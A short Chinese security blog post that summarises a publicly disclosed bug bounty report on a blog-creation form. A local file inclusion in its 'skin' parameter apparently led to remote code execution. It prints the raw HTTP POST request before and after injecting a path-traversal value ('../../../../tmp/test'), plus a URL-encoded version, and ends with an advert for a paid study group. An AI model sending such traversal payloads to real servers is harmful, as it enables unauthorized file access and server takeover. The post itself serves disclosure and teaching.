由LFI所导致的RCE
由LFI所导致的RCE
nullsub 迪哥讲事 2024-05-16 20:30
正文
创建博客/文章/文件功能出现问题。
原请求:
POST /blog/new/ HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://phabricator.48bits.com/phame/blog/new/
Cookie: phsid=o36kfovszv6sqpbjheacicu2ykx25lqoh5iepeit; phusr=guest
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 254
__csrf__=xxxyyy&__form__=1&name=username&skin=xxxxx
注入payload之后:
POST /blog/new/ HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://phabricator.48bits.com/phame/blog/new/
Cookie: phsid=o36kfovszv6sqpbjheacicu2ykx25lqoh5iepeit; phusr=guest
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 254
__csrf__=xxxyyy&__form__=1&name=username&skin=../../../../../../../../../../tmp/test
注:../../../../../../../../../../tmp/test编码以后就是%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%74%6d%70%2f%74%65%73%74
类似这种创建文章/博客/文件之类的一个 隐患就是有可能将文件上传到服务器
这里就出现了一个利用LFI获得了远程代码执行,从而获得服务器数据的访问权限
如果你是一个长期主义者,欢迎加入我的知识星球,我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款前面有同学问我有没优惠券,这里发放100张100元的优惠券,用完今年不再发放
往期回顾
参考
https://hackerone.com/reports/39428